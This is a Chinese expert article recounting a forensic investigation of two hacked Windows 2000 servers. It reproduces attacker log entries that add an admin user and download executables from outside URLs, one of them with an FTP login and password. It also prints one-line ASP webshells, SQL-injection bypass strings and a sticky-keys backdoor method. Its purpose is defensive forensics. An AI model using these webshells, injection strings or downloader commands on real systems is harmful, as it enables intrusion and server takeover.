安全專家：真實的網絡***取證紀實

誠信網安－－子明

【51CTO.com 專家特稿】隨着信息技術的發展，愈來愈多的人都喜歡用計算機辦公，發郵件，建設本身的個 人站點，公司創建本身的企業站點，政府也逐漸的採起了網上辦公，更好的爲人民服務，銀行和證券機構也都開始依託互聯網來進行金融和股票交易，可是隨着方便 的同時也同時帶來了新的一些計算機網絡安全隱患，隨着司法機關的介入，我相信在不久的未來，網絡***調查取證也會成爲立法機構必需要考慮設立的一門新的學 科，目前來講開設這個的課程多在網絡警察和一些特殊機關，如今我來給你們講下我親身經歷並參與完成的一次取證過程，用事實來說述；

我一直從事病毒分析，網絡***響應相關的工做，此次應好朋友的邀請，幫忙配合去協查幾臺服務器，咱們來到了某XXX駐地，首先進行例行檢查。通過了 1天左右的時間的檢查，其中用到了一些專用設備也包含自主編寫的工具以及第三方提供的勘察取證軟件，共發現問題主機服務器10臺，其中2臺比較嚴重，（以 下用A服務器和B服務器來代替）和朋友商定後，決定帶回咱們的實驗室，進行專項深刻分析。

習慣的檢查步驟操做：

服務器操做系統版本信息——>操做系統補丁安裝狀況——>操做系統安裝時間，中間有沒有通過進行從新安裝——>服務器維護狀況——>服務器上面安裝的軟件版本信息

日誌檢查——IDS日誌信息/IIS日誌信息/系統日誌信息
網站代碼審查——是否存在一句話***，源代碼上是否存在惡意代碼插入
殺毒軟件版本更新狀況——是不是最新版本，配置的是否合理，配套的監視是否所有打開
數據恢復——>利用專用數據恢復軟件進行數據恢復，恢復一些被刪除的日誌信息和系統信息，曾經安裝過的文件操做信息。
提取可疑文件（病毒、***、後門、惡意廣告插件）——在系統文件目錄利用第三方或者自開發軟件，對可疑文件進行提取並進行深度分析。

上述步驟是我我的總結的，有不妥的地方還請朋友們指正，介紹完理論，咱們來實踐處理下這兩臺服務器。

A服務器檢查處理過程

該A服務器所裝的操做系統是Advanced 2000 server，服務器上安裝的有瑞星2008殺毒軟件，病毒庫已經更新到最新版本。可是並無安裝網絡防火牆和其餘系統監視軟件，安裝的ftp服務器版本爲server-u 6.0（存在溢出***的威脅）

一 對原始數據進行恢復
利用Datarecover軟件來恢復一些被刪除的文件,目的是但願從被刪除的 文件來找出一些***或者後門以及病毒。進行深度分析，把曾經作過的格式化，以及在回收站中刪除過的文件恢復過來，可是遺憾的是成功拿下這臺服務器權限的黑 客已經作了專業處理，把他的一些痕跡進行了全面清理，我的認爲他使用了日本地下***組織開發的專項日誌清除工具，通過我和助手的共同努力仍是把系統日誌恢 復到當年5月份。

二 手工分析可疑文件
在本服務器的c盤根目錄下面有一個sethc..exe 文件。這個文件是微軟自帶的，是系統粘制鍵，真實的大小應爲27kb，而這個文件爲270kb，起初我覺得是因爲打補丁的緣由。可是通過翻閱一些資料和作 比對以後，才知道這樣的文件是一個新開發的流行後門，主要用法：經過3389終端，而後經過5次敲擊shift鍵，直接調用sethc.exe而直接取得 系統權限。隨後達到控制整個服務器，一般他仍是經過刪除正常的一些c盤exe文件。而後把本身僞形成那個所刪除的exe文件名。形成一種假象。

這裏咱們提供解決方法以下：我的建議這個功能實用性並不高，建議直接刪除這個文件，若是有人利用這個手法來對你的服務器進行***，那就確定是有人作了手腳，能夠第一時間發現******行爲，也能夠做爲取證分析的一個思路；在控制面板的輔助功能裏面設置取消粘制鍵。

3、 利用專用防火牆檢查工具去查看網絡鏈接狀況
目的是經過抓數據包來找出問題。若是對方安裝的有遠程控制終端，他確定須要讓保存在服務器上的後門和控制終端進行通話，會有一個會話鏈接。經過防火牆的攔截功能而去尋找出控制的源頭。這個上面沒有發現存在反彈***，因此沒有看到***的源頭。

4、檢查系統日誌
做用：檢查系統日誌是否被***者清除，若是日誌被***者刪除，須要用數據恢復軟件恢復操做系統日誌
檢查內容：主要包括IIS日誌，安全性日誌，系統日誌。

更近一步深刻檢查：
找到日誌後，仔細分析網站是否有***者留下的webshell,尤爲是一句話後門
根據Webshell的名字， 在IIS 訪問日誌裏搜索相關的名字，找到***者經常使用的ip地址，分析ip地址
還能夠根據此IP地址檢索IIS日誌中，此***者都進行過什麼樣的操做
技術點滴：若是你比較熟悉Webshell，經過Get操做能夠知道***者都進行過何種操做。由於Get操做是被系統記錄的。

若是***者裝有系統級的後門，用經常使用工具好比冰刃(IceSword),System Repair Engineer (SREng)等分析出可疑文件，用其餘調試工具分析找到***者控制端IP地址。

經過服務器日誌查出隱藏在後面的幕後***
經過iis的log訪問日誌，排查出三個可疑目標，其中一個手法相對於後兩個***者更熟練一些，他 在今年5月份左右或者更早就拿到了該服務器權限，上來以後到是沒有作任何的添加和修改，從技術上來看，他是經過尋找網站的注入點進來的，而後在上面放了不 少的後門，還放了一個mm.exe的文件，可是由於技術問題，沒有把這個馬運行起來，從外部訪問只是在主頁上顯示爲mm.jpeg，假裝成了圖片。可是打 開之後，什麼都沒有。通過咱們分析之後，它是一張裸女的jpeg文件。若是他這個mm.exe成功，徹底有可能將該主站頁面換成一張×××。危害仍是有 的。另外該站點權限給的太高，在訪問新聞頻道的時候，直接就是sa權限。這個是最高系統級和Admin是一個級別的。

因爲服務器被網管人員從新裝過，初步懷疑是用的ghost安裝的，形成了原珍貴日誌數據沒法找回，咱們只能分析出7月份-12月份這段時間的日誌，經過這些日誌咱們又發現了針對此站點的***記錄。

***者操做再現：（******操做過程分析）

2007-07-15 14:51:53 61.184.107.206 添加管理用戶 net localgroup administrator Cao$ /add
2007-07-15 15:08:56 61.184.107.206 寫下載exe的vbs腳本 c:\admin.vbs 試圖下載exe地址爲： [url]http://www.dianqiji.com/pic/2007/0428/admin.exe[/url] 

2007-08-12 09:48:45 218.205.238.6 寫入webshell小馬:d:\ybcenter\gg3.asp shell裏留的QQ:183037，以後此人頻繁用此後門登錄服務器

2007-08-25 08:03:15 218.28.24.118 曾訪問他之前留下的操做數據庫的webshell /system/unit/main.asp 此後門能夠瀏覽到敏感數據庫的信息
2007-08-25 08:12:45 218.28.24.118 寫入另外一個webshell D:\ybcenter\ggsm.asp
以後，218.28.24.118用之前留下的功能比較全的webshell /Cnnsc.asp和/system/unit/Cnnsc.asp頻繁操做服務器上文件
2007-11-11 14:23:23 218.28.24.118 用他曾經留下的操做數據庫的後門/service/asp.asp訪問敏感數據庫的信息
2007-08-25 08:27:57 218.28.24.118  用他曾經留下的操做數據庫的後門/system/unit/sql.asp訪問敏感數據庫的信息
2007-11-11 11:02:55 218.28.24.118 試圖訪問他曾經留下的操做數據庫的後門/yb/in_main3.asp訪問敏感數據庫

2007-08-06 12:42:41 218.19.22.152 寫下載腳本C:\down.vbs 下載的exe爲 [url]http://ray8701.3322.org/1.exe[/url]

2007-08-09 11:57:16 218.19.98.147 寫ftp下載exe的腳本c:\zxq.txt ftp服務器203.253.31.244 用戶名kick1000 密碼84460965 下載1.exe
2007-08-26 07:43:47 123.5.57.117 試圖***服務器
2007-08-26 07:43:47 123.5.57.117 寫ftp下載exe的腳本c:\zxq.txt ftp服務器203.253.31.244 用戶名kick1000 密碼84460965 下載1.exe

2007-12-10 12:41:34 123.52.18.141 檢測注入

5、查看登錄信息  查看是否存在有克隆賬戶。
方法：檢查註冊表裏面的sam文件有沒有相同的fv，在這裏檢查過程當中沒有發現存在有克隆賬號。

6、查看系統安裝日誌，在這裏並未發現問題。

7、 查看IIS訪問日誌，在這裏發現了***者信息。
2007-12-01 08:55:16 220.175.79.231 檢測注入
2007-12-03 18:40:48 218.28.68.126 檢測注入
2007-12-04 01:31:32 218.28.192.90 檢測注入，掃描web目錄
2007-12-04 23:23:33 221.5.55.76  檢測注入
2007-12-05 09:20:57 222.182.140.71 檢測注入
2007-12-08 09:39:53 218.28.220.154 檢測注入
2007-12-08 21:31:44 123.5.197.40 檢測注入
2007-12-09 05:32:14 218.28.246.10 檢測注入
2007-12-09 08:47:43 218.28.192.90 檢測注入
2007-12-09 16:50:39 61.178.89.229 檢測注入
2007-12-10 05:50:24 58.54.98.40  檢測注入

定位可疑IP地址，追蹤來源 查出IP地址的信息。

8、查看網站首頁的源代碼，在iframe 這個位置查看是否有不屬於該網站的網站信息。（查找 網馬的方法），以及如何發現一些潛在的***和網絡可利用漏洞。
下面是咱們獲得的一些他的網馬。

gg3.asp Q:183637 log.asp pigpot.asp webdown.vbs attach/a.gif attach/chongtian.gif attach/111.rar system/unit/yjh.asp system/unit/conn.asp 加入防注入 Q:6242889678 p_w_picpaths/mm.jpg = exe自解壓 主頁包含文件

一句話***：<%execute request %>
備份一句話*** <%eval(request("a"):response.end%>
注射檢查，在IIS裏面查找是否存在的有針對  %20 and 1=1’sql
'or'='or' a'or'1=1--  ,'or1=1-- ,"or1=1-- ,or1=1--, 'or'a'='a, "or"="a'='a等
做用：躲避驗證信息  主要用在後臺登錄上

%5c 爆數據庫，做用直接下載服務器上的數據庫，得到用戶名和密碼，通過系統提權而拿到整個服務器權限。
針對一些下載者這樣的*** ，主要須要在windows /document and setting下面的local  setting 的 temp 或者 temp internet的這個文件夾中查看剛生成的exe文件，重點查看一下在system32文件夾下面的exe文件，尤爲關注最新生成的exe文件，僞造的 系統文件等。

以上就是針對A服務器的整個檢查過程以及發現問題後該如何處理和補救的相關解決方法。

B服務器檢查取證分析

B服務器裝的是windows2000　server版本，操做步驟同上。

通過一段細心的檢查仍是讓我和助手們發現了一個***，原由是在網站源代碼處發現都被插入了一些奇怪的代碼，在system32系統文件夾下還發現了新的niu.exe,很是可疑，提取該exe文件，在虛擬機中進行分析，得出該exe工做原理：

該exe屬***類，病毒運行後判斷當前運行文件的文件路徑若是不是%System32%\SVCH0ST.EXE，將打開當前文件的所在目錄複製自 身到%System32%下，改名爲SVSH0ST.EXE，並衍生autorun.inf文件；複製自身到全部驅動器根目錄下，改名爲niu.exe， 並衍生autorun.inf文件，實現雙擊打開驅動器時，自動運行病毒文件；遍歷全部驅動器，在htm、asp、aspx、php、html、jsp格 式文件的尾部插入96個字節的病毒代碼；遍歷磁盤刪除以GHO爲擴展名的文件，使用戶沒法進行系統還原；鏈接網絡下載病毒文件；修改系統時間爲2000 年；病毒運行後刪除自身。

以上是我配合有關部門參與的真實的一次的取證記錄，由於答應過朋友要保守祕密，因此真實的一些ip地址和信息這裏都作保留。同時在這裏我要感謝安天cert組的戰友的幫忙，以及身邊的2個助手的並肩做戰。